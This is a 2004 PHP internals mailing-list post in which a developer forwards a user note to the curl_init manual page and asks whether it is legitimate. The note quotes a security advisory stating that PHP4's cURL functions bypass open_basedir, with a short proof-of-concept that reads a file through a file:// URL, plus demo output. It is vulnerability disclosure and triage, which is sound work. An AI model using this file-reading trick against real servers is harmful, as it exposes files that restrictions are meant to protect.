Newsgroups: php.internals
Path: news.php.net
Xref: news.php.net php.internals:13584
Return-Path: <sean@caedmon.net>
Mailing-List: contact internals-help@lists.php.net; run by ezmlm
Delivered-To: mailing list internals@lists.php.net
Received: (qmail 63514 invoked by uid 1010); 28 Oct 2004 16:08:24 -0000
Delivered-To: ezmlm-scan-internals@lists.php.net
Delivered-To: ezmlm-internals@lists.php.net
Received: (qmail 59335 invoked from network); 28 Oct 2004 16:07:51 -0000
Received: from unknown (HELO iconoclast.caedmon.net) (66.45.230.241)
  by pb1.pair.com with SMTP; 28 Oct 2004 16:07:51 -0000
Received: from sarcasm ([10.20.31.100])
	by iconoclast.caedmon.net with esmtp (Exim 3.35 #1 (Debian))
	id 1CNCoW-0004Ez-00
	for <internals@lists.php.net>; Thu, 28 Oct 2004 12:07:48 -0400
Message-ID: <41811956.4050405@caedmon.net>
Date: Thu, 28 Oct 2004 12:07:50 -0400
User-Agent: Mozilla Thunderbird 0.7.3 (X11/20040830)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  internals@lists.php.net
X-Enigmail-Version: 0.85.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Subject: [Fwd: [PHP-NOTES] note 46955 added to function.curl-init]
From: sean@caedmon.net (Sean Coates)

Is this legitimate?
I took a (very) quick look at bugs, and didn't see it.

(deleted the note)

S

-------- Original Message --------
Subject: [PHP-NOTES] note 46955 added to function.curl-init
Date: Thu, 28 Oct 2004 09:03:55 -0700
From: mars012.mail.ru@osu1.php.net (a)
To: php-notes@lists.php.net

from http://www.packetstormsecurity.org/0410-advisories/php4curl.txt

====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compile with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Tipe: Local
Risk: Low/Medium
=====================================================

PHP cURL functions bypass open_basedir
protection, so users can navigate through
filesystem.

For example, setting "open_basedir" in php.ini to
"/var/www/html" anybody can retrieve "/etc/parla"
using cURL functions.

== Proof of concept (curl.php)
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>

== Demo
$ cat /etc/parla
don't read please!

$ links -dump http://localhost/curltest/curl.php
don't read please!

== Release Timeline
No release timeline.

-- 
FraMe <frame@kernelpanik.org>
http://www.kernelpanik.org
----
Manual Page -- http://www.php.net/manual/en/function.curl-init.php
Edit        -- http://master.php.net/manage/user-notes.php?action=edit+46955
Delete      -- 
http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes
   Reason: bad code                  -- 
http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=bad+code
   Reason: spam                      -- 
http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=spam
   Reason: useless example           -- 
http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=useless+example
   Reason: contains commercial links -- 
http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=contains+commercial+links
   Reason: useless note              -- 
http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=useless+note
Reject      -- 
http://master.php.net/manage/user-notes.php?action=reject+46955&report=yes
Search      -- http://master.php.net/manage/user-notes.php

-- 
PHP Notes Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php